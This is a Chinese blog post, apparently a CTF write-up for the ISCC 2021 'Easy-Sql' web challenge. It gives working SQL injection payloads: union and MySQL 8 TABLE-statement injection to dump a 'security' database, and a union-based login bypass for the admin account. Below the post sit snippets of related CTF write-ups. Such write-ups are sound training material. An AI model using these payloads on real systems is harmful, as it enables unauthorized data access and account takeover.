ISCC-2021-Easy-Sql

最新推荐文章于 2024-06-14 10:30:09 发布
最新推荐文章于 2024-06-14 10:30:09 发布
阅读量484 收藏 9
点赞数 9
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_25635183/article/details/138602268
版权

根据提示,在网址后面加上?id

尝试?id=1 and 1=1

有回显,存在SQL注入,尝试用union联合注入的方法

?id=-1 union select 1,2

这里 select过滤,尝试绕过,如大小写的绕过、编码等,依然无效,直接上工具sqlmap

这里得到的结果是,本网站使用的是MySQL 8.0

去查了一下MySQL 8.0 是存在table注入的,因此尝试使用table进行注入

知识积累:

TABLESELECT的区别

1.TABLE始终显示表的所有列

2.TABLE不允许对行进行任意过滤,即TABLE 不支持任何WHERE子句

可以简单测试一下是否存在table注入:?id=-1 union table users limit 0,1

结果是存在的,继续爆破数据库

得到数据库名:security

根据题目要求

因此大胆猜测有张表就叫email或者emails

尝试一下:?id=-1 union table security.email limit 0,1 或者?id=-1 union table security.email limit 0,1

通过测试,表名是emails

但是在查的时候是limit 0,1 查询出来不是Beaxia,而是Dumb,所以继续往下查询

?id=-1 union table security.email limit 7,1

这里显示有一个zip,于是去下载下来看看

http://39.106.87.115:7009/ypHeMPardErE.zip

解压出来是一个网页文件,点开,查看网页源代码

可以通过username注入,提交username必须为admin,并且后面需要通过$row['passwd'] == $passwd

构造post参数:username=admin' union select 1, 'admin', 'Dumb'-- &passwd=Dumb

sinat_25635183
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ISCC-2022 部分wp
qaq517384的博客
06-07 3062
目录Web冬奥会Misc单板小将苏翊鸣2022冬奥会藏在星空中的诗-1ReverseAmy's Code Web 冬奥会 $info[“year”]=2022,if比较的赋值,永真 0项值为0绕过array_search()函数,其他随意 payload: ?Information={"year":"a","items":[0,["1","2","3"],"1"]} Misc 单板小将苏翊鸣 改图片高度得到二维码,扫码回答问题 15942为压缩包密码 解压得到flag 2022冬奥会 吉祥物(压缩包密码)
ISCC2022--Writeup
m0_61596829的博客
06-03 6443
ISCC2022--writeup
ISCC,Web:Easy-SQL
Pai_Space
05-25 2365
select 等被过滤,绕不过 id=1 至 8 有一些信息 id=8 时 用 sqlmap 可以查到数据库是 Mysql 8 Mysql 8 存在 table 注入 浅谈利用mysql8新特性进行SQL注入 - 安全客,安全资讯平台 测是否存在 http://59.110.159.206:7010/?id=-1 union table users limit 0,1 存在,可以利用,由于 id=8 时提示查邮件,看看是否存在 email 回显了 email,查 b
iscc-2022
zhhhb1005的博客
06-05 1003
分析题目,info被强制转换成为数组,get传参 information ,同时要满足step1和step2才能得到flag。step1要求year=2022step2要求item为三个值的数组,第一个值为数组payload pop2022 看开头意思是如果使用get的wish传参那么就反序列化这个wish,如果不是则显示源代码。 流程 exp payload: get传参,然后将结果base64解密。 访问/ypHeMPardErE.zip ,得到源码 这⾥之前可以判断
ISCC-WP
热门推荐
qq_53142368的博客
06-04 1万+
2022-ISCC
ISCC-2022
ki10Moc的博客
06-06 3735
pyccwp
[CTF]-ISCC2022复现
Mr.木Mu
05-26 7361
[CTF]-ISCC2022复现前言Misc2022冬奥会单板小将苏翊鸣隐秘的信息降维打击藏在星空中的诗-1藏在星空里的诗-2真相只有一个套中套666(擂台)Web冬奥会Pop2022这是一道代码审计题Easy-SQL让我康康findme爱国敬业好青年-2总结 前言 一年一度的ISCC终于结束,题目质量很高,高到做不出来 讲道理,擂台题是真的为了出题而出题,真的卷不动了 以下是自己整理的wp,有详有略,感谢师傅们借鉴思路 Misc 2022冬奥会 图片CRC值报错 修改高度 得到unicode编码
[ISCC 2021]部分wp
Huamang的博客
05-05 3519
海市蜃楼-1 直接改后缀zip,搜flag直接找到 Retrieve the passcode 给了一堆三维的数据,提到了scatter,所以猜测是利用python来画散点图 1:3:1;1.25:3:1;1.5:3:1;1.75:3:1;2:3:1;2:2.75:1;2:2.5:1;2:2.25:1;2:2:1;2:1.75:1;2:1.5:1;1:2.25:1;1.25:2.25:1;1.5:2.25:1;1.75:2.25:1;1:1.5:1;1.25:1.5:1;1.5:1.5:1;1.75:1.5
ISCC2021✿题目以及部分wp
一个普普通通的博客
05-19 4753
文章目录ISCC 部分web、杂项wpWEBISCC客服一号冲冲冲(一)这是啥Web01ISCC客服一号冲冲冲(二)登录misc李华的红包Retrieve_the_passcode海市蜃楼1美人计检查一下小明的宠物兔小明的表情包 ISCC 部分web、杂项wp ISCC2021马上结束,作为一名CTF萌新,通过比赛也成长了一些,拿下了其中几道(一点点点点)题目,现分享一些自己做的题目 另附iscc2021线上赛赛题(无web,pwn) 看完后各位看官记得给个三连鼓励一下 WEB ISCC客服一号冲冲冲(一
iscc-cli:国际会议
05-09
iscc-cli-命令行工具 一个基于为数字媒体文件创建ISCC代码的命令行工具。目录背景国际标准内容规范是针对分散式内容标识的的提议。 ISCC代码是根据内容本身通过算法生成的,并提供了许多强大的功能,例如内容相似性...
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip
ISCC-2020-J07
03-26
ISCC-2020-J07
ISCC-2020-J06
02-14
ISCC-2020-J06
ISCC-parasite
04-01
ISCC-parasite
mysql-线上常用运维sql-2
jll126的博客
06-11 362
在MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
LLM之RAG实战(四十)| 使用LangChain SQL Agent和MySQL搭建多层RAG ChatBot
最新发布
wshzd的博客
06-14 601
在第二层,SQL Agent首先获取到用户的问题,然后要求 LLM 根据用户的问题创建 SQL 查询,使用内置函数在MySQL数据库上运行查询。在这里,我们使用的是 ChatPromptTemplate,如果你真的研究它,你会看到它是如何专门编写的,用于创建和运行 SQL 查询。在下一段代码中,将使用上一个代码块中定义的变量创建 QA 链,将消息添加到聊天记录中,然后运行链以获取改进的查询。这是代码的最后一部分,它将首先运行第一层以获取改进的查询,然后我们使用该改进的查询来获得最终响应。
PostgreSQL 快速入门与实战
代码洁癖症患者
06-11 901
# 创建模式## 删除模式## 删除模式并且删除该模式下的数据对象。
JavaSpringboot+vur前后端分离党员信息管理系统(源码+sql+论文)
u014445459的博客
06-11 772
简化系统开发和维护。它做的事情越多,就封装了常见的JavaScript功能和代码,并提供了一个简单的JavaScript设计相关的模式,用于优化HTML文档操作、事件处理、CSS样式化、动画设计和Ajax请求交互。在互联网技术高速发展的今天,通过互联网的传播会让企业更容易的创造更多的经济效益,利用互联网的传播党建信息管理、通过网页版党建信息管理平台的实现 ,让更多人了解到党建新闻、组织风采等相关信息、得到了更大的宣传,在这样一个大环境下把资源统筹规化起来,就会获得高效的党建党员信息和推广。
RG-DIC位移场算法
08-25
- *1* *2* *3* [2018 ISCC Writeup](https://blog.csdn.net/weixin_30292745/article/details/95786581)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值